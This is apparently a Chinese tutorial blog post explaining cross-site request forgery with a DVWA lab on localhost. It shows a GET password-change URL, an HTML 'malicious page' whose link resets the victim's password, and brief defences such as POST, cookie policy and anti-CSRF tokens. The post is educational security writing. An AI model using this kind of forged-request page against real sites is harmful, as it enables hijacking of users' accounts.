温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

简述CSRF请求跨站伪造

发布时间:2020-10-23 22:50:17 来源:网络 阅读:917 作者:天道酬勤VIP 栏目:安全技术

首先什么是CSRF:


简述CSRF请求跨站伪造


如图:

    1,用户通过浏览器正常访问带有CSRF漏洞的网站。


        如我去访问http://127.0.0.1:8080/DVWA/login.php

        简述CSRF请求跨站伪造


        我们登录进去账号是:admin 密码是:password,找到一个修改密码的地方

        简述CSRF请求跨站伪造

        修改密码为123456,修改的url是:

        http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#

        简述CSRF请求跨站伪造

        

    2,我们构造恶意网站B将代码保存为index.html

<html>
	<head>
	
	<title>这是恶意网页</title>
	</head>
	
	<body>
	<h2>这是恶意网页<h2>
	<a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a> 
	
	</body>

</html>

        我们访问网站B:点击***

        简述CSRF请求跨站伪造

     

        我们可以看到密码被改了(改成了password)

        简述CSRF请求跨站伪造


防御:

   1.尽量使用POST,限制GET

   2.浏览器Cookie策略

   3.Anti CSRF Token




微信公众号:

简述CSRF请求跨站伪造


向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI